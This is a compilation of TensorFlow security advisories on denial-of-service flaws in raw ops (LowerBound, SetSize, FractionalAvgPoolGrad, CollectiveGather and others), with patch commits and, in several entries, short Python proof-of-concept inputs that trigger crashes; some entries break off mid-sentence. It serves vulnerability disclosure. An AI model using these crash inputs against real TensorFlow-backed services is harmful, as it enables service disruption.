#dos

TensorFlow is an open source platform for machine learning. If `Save` or `SaveSlices` is run over tensors of an unsupported `dtype`, it results in a `CHECK` fail that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 5dd7b86b84a864b834c6fa3d7f9f51c87efa99d4. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.

TensorFlow is an open source platform for machine learning. If `LRNGrad` is given an `output_image` input tensor that is not 4-D, it results in a `CHECK` fail that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit bd90b3efab4ec958b228cd7cfe9125be1c0cf255. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.

TensorFlow is an open source platform for machine learning. If `RaggedBincount` is given an empty input tensor `splits`, it results in a segfault that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 7a4591fd4f065f4fa903593bc39b2f79530a74b8. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.

TensorFlow is an open source platform for machine learning. `ParameterizedTruncatedNormal` assumes `shape` is of type `int32`. A valid `shape` of type `int64` results in a mismatched type `CHECK` fail that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 72180be03447a10810edca700cbc9af690dfeb51. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.

### Impact If `LowerBound` or `UpperBound` is given an empty`sorted_inputs` input, it results in a `nullptr` dereference, leading to a segfault that can be used to trigger a denial of service attack. ```python import tensorflow as tf out_type = tf.int32 sorted_inputs = tf.constant([], shape=[10,0], dtype=tf.float32) values = tf.constant([], shape=[10,10,0,10,0], dtype=tf.float32) tf.raw_ops.LowerBound(sorted_inputs=sorted_inputs, values=values, out_type=out_type) ``` ```python import tensorflow as tf out_type = tf.int64 sorted_inputs = tf.constant([], shape=[2,2,0,0,0,0,0,2], dtype=tf.float32) values = tf.constant(0.372660398, shape=[2,4], dtype=tf.float32) tf.raw_ops.UpperBound(sorted_inputs=sorted_inputs, values=values, out_type=out_type) ``` ### Patches We have patched the issue in GitHub commit [bce3717eaef4f769019fd18e990464ca4a2efeea](https://github.com/tensorflow/tensorflow/commit/bce3717eaef4f769019fd18e990464ca4a2efeea). The fix will be included in TensorFlow 2.10.0. We wi...

### Impact When `TensorListFromTensor` receives an `element_shape` of a rank greater than one, it gives a `CHECK` fail that can trigger a denial of service attack. ```python import tensorflow as tf arg_0=tf.random.uniform(shape=(6, 6, 2), dtype=tf.bfloat16, maxval=None) arg_1=tf.random.uniform(shape=(6, 9, 1, 3), dtype=tf.int64, maxval=65536) arg_2='' tf.raw_ops.TensorListFromTensor(tensor=arg_0, element_shape=arg_1, name=arg_2) ``` ### Patches We have patched the issue in GitHub commit [3db59a042a38f4338aa207922fa2f476e000a6ee](https://github.com/tensorflow/tensorflow/commit/3db59a042a38f4338aa207922fa2f476e000a6ee). The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the securit...

### Impact When `SetSize` receives an input `set_shape` that is not a 1D tensor, it gives a `CHECK` fails that can be used to trigger a denial of service attack. ```python import tensorflow as tf arg_0=1 arg_1=[1,1] arg_2=1 arg_3=True arg_4='' tf.raw_ops.SetSize(set_indices=arg_0, set_values=arg_1, set_shape=arg_2, validate_indices=arg_3, name=arg_4) ``` ### Patches We have patched the issue in GitHub commit [cf70b79d2662c0d3c6af74583641e345fc939467](https://github.com/tensorflow/tensorflow/commit/cf70b79d2662c0d3c6af74583641e345fc939467). The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. ##...

### Impact The implementation of `BlockLSTMGradV2` does not fully validate its inputs. - `wci`, `wcf`, `wco`, `b` must be rank 1 - `w`, cs_prev`, `h_prev` must be rank 2 - `x` must be rank 3 This results in a a segfault that can be used to trigger a denial of service attack. ```python import tensorflow as tf use_peephole = False seq_len_max = tf.constant(1, shape=[], dtype=tf.int64) x = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32) cs_prev = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32) h_prev = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32) w = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32) wci = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32) wcf = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32) wco = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32) b = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32) i = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32) cs = tf.constant(0.504355371, shape...

### Impact The implementation of `FractionalAvgPoolGrad` does not fully validate the input `orig_input_tensor_shape`. This results in an overflow that results in a `CHECK` failure which can be used to trigger a denial of service attack. ```python import tensorflow as tf overlapping = True orig_input_tensor_shape = tf.constant(-1879048192, shape=[4], dtype=tf.int64) out_backprop = tf.constant([], shape=[0,0,0,0], dtype=tf.float64) row_pooling_sequence = tf.constant(1, shape=[4], dtype=tf.int64) col_pooling_sequence = tf.constant(1, shape=[4], dtype=tf.int64) tf.raw_ops.FractionalAvgPoolGrad(orig_input_tensor_shape=orig_input_tensor_shape, out_backprop=out_backprop, row_pooling_sequence=row_pooling_sequence, col_pooling_sequence=col_pooling_sequence, overlapping=overlapping) ``` ### Patches We have patched the issue in GitHub commit [03a659d7be9a1154fdf5eeac221e5950fec07dad](https://github.com/tensorflow/tensorflow/commit/03a659d7be9a1154fdf5eeac221e5950fec07dad). The fix will be inc...

### Impact When `CollectiveGather` receives an scalar input `input`, it gives a `CHECK` fails that can be used to trigger a denial of service attack. ```python import tensorflow as tf arg_0=1 arg_1=1 arg_2=1 arg_3=1 arg_4=(3, 3,3) arg_5='auto' arg_6=0 arg_7='' tf.raw_ops.CollectiveGather(input=arg_0, group_size=arg_1, group_key=arg_2, instance_key=arg_3, shape=arg_4, communication_hint=arg_5, timeout_seconds=arg_6, name=arg_7) ``` ### Patches We have patched the issue in GitHub commit [c1f491817dec39a26be3c574e86a88c30f3c4770](https://github.com/tensorflow/tensorflow/commit/c1f491817dec39a26be3c574e86a88c30f3c4770). The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/S...